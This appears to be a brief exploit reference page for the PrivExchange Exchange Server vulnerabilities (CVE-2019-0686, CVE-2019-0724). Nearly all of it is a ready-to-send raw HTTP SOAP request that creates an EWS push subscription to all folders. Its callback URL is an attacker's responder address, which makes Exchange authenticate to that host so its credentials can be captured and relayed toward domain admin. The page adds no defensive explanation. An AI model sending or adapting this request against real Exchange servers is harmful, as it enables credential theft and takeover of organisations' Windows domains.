CVE

PrivExchange - Abusing Exchange: One API call away from Domain Admin (CVE-2019-0686 & CVE-2019-0724)

Abusing Exchange - One API call away from Domain Admin Exploiting PrivExchange

Examples

SOAP request creating subscription to mailbox

POST /ews HTTP/1.1
Host: exchange.example.com
Accept: */*
Accept-Language: nl-nl
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=UTF-8
Content-Length: 934
Connection: close
Referer: https://exchange.example.com/ews
User-Agent: iPhone/11.1

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
    <soap:Header>
        <t:RequestServerVersion Version="Exchange2013" />
    </soap:Header>
    <soap:Body>
        <m:Subscribe>
            <m:PushSubscriptionRequest SubscribeToAllFolders="true">
                <t:EventTypes>
                    <t:EventType>NewMailEvent</t:EventType>
                    <t:EventType>ModifiedEvent</t:EventType>
                    <t:EventType>MovedEvent</t:EventType>
                </t:EventTypes>
                <t:StatusFrequency>1</t:StatusFrequency>
                <t:URL>http://<responder-IP-adres/gibcredsplz_2013_4/</t:URL>
            </m:PushSubscriptionRequest>
        </m:Subscribe>
    </soap:Body>
</soap:Envelope>

URL list